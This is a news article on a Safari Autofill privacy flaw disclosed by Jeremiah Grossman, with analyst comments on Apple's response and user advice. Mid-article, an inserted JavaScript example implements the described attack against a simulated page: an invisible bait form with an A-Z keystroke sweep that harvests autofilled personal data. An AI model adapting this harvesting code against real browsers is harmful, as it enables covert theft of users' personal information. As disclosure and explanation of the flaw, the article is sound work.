Sabkush Headlines: Safari Autofill Full of Fail

Safari's Autofill feature, which can be set to automatically insert a user's data such as name and address into Web forms, could expose users to theft of their personal information, according to security expert Jeremiah Grossman.

Grossman, the founder and CTO of security firm WhiteHat, wrote in his blog that the feature autofills HTML form text fields with specific attribute names such as "name," "company," "city," and "state." It works even though the victim has never entered this data on any website, because the values are drawn from the user's Address Book card rather than from earlier form submissions. It has been known since 2006 that a browser's Autofill feature could be a security risk.

Stealing Data With Safari Autofill

Safari browser users can have their data stolen the moment they visit malicious websites, even if they've not visited those sites before or entered any personal information, Grossman wrote.

"All a malicious website would have to do to surreptitiously extract Address Book card data from Safari is dynamically create form text fields with the aforementioned names, probably invisibly, and then simulate A-Z keystroke events using JavaScript," Grossman wrote.

Once the web form has been autofilled, the data can be sent to the attacker, Grossman wrote. "The entire process takes mere seconds and represents a major breach in online privacy," Grossman wrote.

Multi-stage attacks, including email spam, spearphishing, stalking and blackmail, could be launched using this technique, Grossman wrote. Such attacks could be easily and cheaply distributed on a large scale using an advertising network "where likely no one would ever notice because it's not exploit code designed to deliver a rootkit payload," Grossman wrote. There is no guarantee this type of attack hasn't already taken place, he said.
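The harvesting loop Grossman describes, as an added example that is not part of the article and is not Grossman's proof of concept. It has not been run against Safari: the FakeDocument, SAMPLE_ADDRESS_BOOK and modelAutofill below are constructed stand-ins, written so the logic runs offline under Node, and the field name "phone" is an assumption rather than a name the article gives. In a real page, sendKey would dispatch a keyboard event on the input; the stand-in instead fills a field only when the typed letter matches the first character of the stored value, which is the model that reproduces both the need for an A-Z sweep and the article's observation that values beginning with a digit never populate.

```javascript
// Added example (not from the article or Grossman's PoC). The FakeDocument,
// SAMPLE_ADDRESS_BOOK and modelAutofill below are constructed stand-ins so the
// harvesting logic runs offline; they are assumptions about, not a record of,
// how Safari behaved.

// Field names the article says Safari autofills from the Address Book card.
// "phone" is an assumed name, present only to show the digit-first limitation.
const BAIT_FIELDS = ['name', 'company', 'city', 'state', 'phone'];
const LETTERS = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ';

// --- minimal DOM stand-in (constructed) ---------------------------------------
class FakeElement {
  constructor(tag) { this.tag = tag; this.attrs = {}; this.children = []; this.value = ''; }
  setAttribute(k, v) { this.attrs[k] = v; }
  getAttribute(k) { return this.attrs[k]; }
  appendChild(c) { this.children.push(c); return c; }
}
class FakeDocument {
  constructor() { this.body = new FakeElement('body'); }
  createElement(tag) { return new FakeElement(tag); }
}

// Constructed sample card (not real data). The phone value begins with a digit,
// standing in for the phone/street data the article says does not populate.
const SAMPLE_ADDRESS_BOOK = {
  name: 'Jane Example', company: 'Example Co', city: 'Cupertino', state: 'CA',
  phone: '408-555-0100',
};

// Modelled autofill reaction to a keystroke in a named text field (assumption):
// the stored value is filled in only when the typed letter matches its first
// character; otherwise the keystroke just types that letter.
function modelAutofill(addressBook) {
  return function sendKey(input, letter) {
    const stored = addressBook[input.getAttribute('name')];
    if (stored && stored[0].toUpperCase() === letter) input.value = stored;
    else input.value = letter;
  };
}

// --- the technique as the article describes it --------------------------------

// Dynamically create text fields with the bait names, positioned off-screen so
// the victim never sees the form fill in.
function buildBaitForm(doc) {
  const form = doc.createElement('form');
  form.setAttribute('style', 'position:absolute;left:-9999px');
  for (const fieldName of BAIT_FIELDS) {
    const input = doc.createElement('input');
    input.setAttribute('type', 'text');
    input.setAttribute('name', fieldName);
    form.appendChild(input);
  }
  doc.body.appendChild(form);
  return form;
}

// Simulate A-Z keystrokes on one field. Autofill only offers a value whose first
// letter matches what was typed, so every letter is tried and the first fill wins.
// A value longer than the single typed letter means autofill supplied it.
function sweepField(input, sendKey) {
  for (const letter of LETTERS) {
    input.value = '';
    sendKey(input, letter);
    if (input.value.length > 1) return input.value;
  }
  return null; // no letter matched: value is empty or starts with a digit
}

// Build the form, sweep each field, and collect whatever autofill revealed.
// In the real attack the returned object would be posted to the attacker's server.
function harvest(doc, sendKey) {
  const form = buildBaitForm(doc);
  const stolen = {};
  for (const input of form.children) {
    const value = sweepField(input, sendKey);
    if (value !== null) stolen[input.getAttribute('name')] = value;
  }
  return stolen;
}

// Stand-alone run against the constructed card:
// harvest(new FakeDocument(), modelAutofill(SAMPLE_ADDRESS_BOOK))
// returns { name: 'Jane Example', company: 'Example Co', city: 'Cupertino', state: 'CA' }
```

Read against the article: the sweep is what makes the attack silent and fast (at most 26 synthetic keystrokes per field, no user interaction), and the "phone" field comes back empty for the same reason the article gives, since no letter of the alphabet can match a value that starts with a digit.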
"This feature just makes it easier for criminals to do mass collections of information that they can later sell, and compromise your identity," said Rob Enderle, principal analyst at the Enderle Group.

However, the Autofill attack can't obtain data beginning with a number, such as phone numbers or street addresses, because "for some reason the data would not populate in the text field," Grossman wrote.

Any Apple Polishing Yet?

Grossman notified Apple (Nasdaq: AAPL) on June 17 and received an autoresponse but hasn't heard from Apple since, he wrote.

"Apple has been substantially less aggressive publicly with security issues than either Mozilla or Microsoft (Nasdaq: MSFT) for over a decade," Enderle pointed out. "It seems to practice the 'don't ask, don't tell' process of threat mitigation in general, which means we are never sure what they actually know with regard to problems," Enderle told MacNewsWorld.

Perhaps Apple has good reason to downplay security threats. "The Mac market share has been small enough that it would take a large percentage of Mac users complaining for a problem to be seen as needing to be addressed," Randy Abrams, director of technical education at ESET, told MacNewsWorld. "I suspect that more than 90 percent of Mac users are completely unaware of the issue so, even if they did care, they don't know to care," Abrams added.

Autofill Attack Targets

Apparently, the attack doesn't work on the browser used in iOS, the operating system Apple uses for the iPhone, iPad and iPod touch, according to one reader's comment on Grossman's blog. Further, some readers weren't able to duplicate the attack on Safari 5, although others were.

Other browsers may not be threatened by the Autofill attack. "I am not aware of the problem affecting other browsers," ESET's Abrams said. "I believe that Safari is unique in linking to the address book by default."
Practicing Safe Mac Use

The solution to this problem seems easy enough: Mac users just have to turn off the Autofill feature in their Safari browsers. "That's true, but who wants to turn off Autofill?" Enderle asked. "That is one handy feature."

However, turning off the Autofill feature isn't enough. "In theory, that's the solution, but users should delete the contents of their address book in the Mac OS and use a third-party address book that's not linked to a browser," ESET's Abrams said.

Users should review the settings of their Web browsers and other applications, Abrams recommended. "There's no guarantee that when the next version of Safari comes out, it won't revert to default settings," he pointed out. Even if users select another browser, such as Firefox, they need to check the default settings, Abrams warned. "Users will never be sure of remaining safe or maintaining their privacy if they do not review their browser settings and change them to enhance security and privacy from the lax default settings the browsers ship with," Abrams remarked.

"Don't use autofill for information such as passwords, birth dates, Social Security numbers, credit card validation numbers and credit card expiration dates," Enderle said. "If you wouldn't put it on Facebook, it shouldn't be in Autofill."

Nothing New Under the Sun?

The danger of the Safari Autofill feature was disclosed as early as April 2009 by Swiss software developer and entrepreneur Patrice Neff. He wrote some HTML code to conduct an autofill attack that would steal a user's birthdate and posted it on his blog. Indeed, the Autofill feature's dangers were being discussed on the Internet as far back as 2006.

Why has nobody done anything about this? "The Autofill feature is really handy and people will often take a very real benefit when it's offset only by a very murky risk," Enderle said.
